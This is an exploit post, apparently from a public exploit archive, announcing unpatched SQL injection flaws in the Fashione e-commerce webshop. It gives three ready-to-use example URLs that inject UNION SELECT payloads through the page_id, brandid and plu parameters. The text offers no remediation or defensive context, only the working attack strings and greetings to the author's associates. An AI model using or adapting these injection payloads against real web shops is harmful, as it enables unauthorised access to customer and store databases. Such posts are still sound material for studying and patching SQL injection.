_____________________//_
/ ___/ _ \/ ___/ ___/ _ \/ __/(__)__//__///__//_
/____/\___/\___/_/ \___/\__/###################################################################### Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities# Date: 2010-09-19# Author: secret# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77# Site : swissfaking.net/board# Software Link: http://www.fashione.co.uk/# Version: All versions so far# Tested on: XP# Fixed? : NOT FIXED----------------------------------------------------------------------------[Multiple SQL Injection Vulnerabilities]"brandid="/"plu="/"page_id="
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4################################################################################################[THANKS TO]
ALLAH - الله لا إله لا ايل
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION
